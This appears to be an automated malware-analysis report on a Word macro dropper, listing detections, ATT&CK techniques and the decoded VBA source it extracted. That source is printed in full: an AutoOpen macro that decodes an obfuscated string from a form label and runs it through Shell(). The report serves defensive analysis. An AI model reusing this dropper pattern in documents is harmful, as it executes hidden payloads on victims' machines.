MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains VBA macros with an autoopen routine that calls the Shell() function, indicating it's designed to execute a payload. The document body explicitly instructs the user to 'Enable Content' to view secure information, a common lure for macro-based malware. The ClamAV detection name 'Doc.Dropper.Agent-6520162-0' further supports its nature as a dropper.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-6520162-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6520162-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.microsoft.com/sharepoint/v3/contenttype/formsIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/metadata/contentTypeIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/metadata/properties/In document text (OLE body)
- http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributesIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/metadata/propertiesIn document text (OLE body)
- http://www.w3.org/2001/XMLSchemaIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/documentManagement/typesIn document text (OLE body)
- http://schemas.microsoft.com/office/infopath/2007/PartnerControlsIn document text (OLE body)
- http://schemas.openxmlformats.org/package/2006/metadata/core-propertiesIn document text (OLE body)
- http://www.w3.org/2001/XMLSchema-instanceIn document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://purl.org/dc/terms/In document text (OLE body)
- http://schemas.microsoft.com/internal/obdIn document text (OLE body)
- http://dublincore.org/schemas/xmls/qdc/2003/04/02/dc.xsdIn document text (OLE body)
- http://dublincore.org/schemas/xmls/qdc/2003/04/02/dcterms.xsdIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1928 bytes |
SHA-256: 5195b8256d915c0186bccec874fac493fa418a61e142ce317d33b8b8da4f9a22 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
Rem bap bap bap
bessameat
End Sub
Attribute VB_Name = "Module1"
Sub bessameat()
Dim str2 As String
Dim id As Integer
Dim ota As Integer
With UserForm1.Label1
ota = .Left
End With
Dim j As Integer
str2 = vantalin(ota)
For j = 0 To 1
supernosa (str2)
id = id + 1
Next
End Sub
Sub supernosa(jon)
Dim td As Integer
td = 254
jsdf = Len(jon)
td = jsdf - td
If jsdf = 254 Then
Shell jon, td
End If
End Sub
Function vantalin(cde)
Dim QlyC As String
Dim Eftdxb() As Byte
Dim Vfxbovft() As Byte
Dim askg As String
askg = "M1Z8CKV"
Dim LanjyA As String
LanjyA = UserForm1.Label2.Caption
Dim Nyji As String
Dim Jvpbobb() As Byte
QlyC = "IhgypyadO"
Vfxbovft = LanjyA
Eftdxb = askg
Ru = UBound(Vfxbovft)
Nyji = "Moaygys"
Dim Lkej5 As String
Yrb = UBound(Eftdxb)
Lkej5 = ""
cde = cde - 11
For iifyjn = 0 To Ru
nvf8 = 0
For ob = 0 To Yrb
If Vfxbovft(iifyjn) = Eftdxb(ob) Then nvf8 = nvf8 + 1
Next
If nvf8 = 0 Then
city = Vfxbovft(iifyjn) - cde
Lkej5 = Lkej5 + Chr$(city)
End If
Next
Dim Rogy As String
vantalin = Lkej5
Rogy = "Create document"
End Function
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{D99F50C2-1CC4-4C88-9387-FEFC4D9A26C5}{952455F0-1062-4F4B-8C62-FD5D484C4145}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
Label1.Caption = "Start"
End Sub
Private Sub Label3_Click()
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.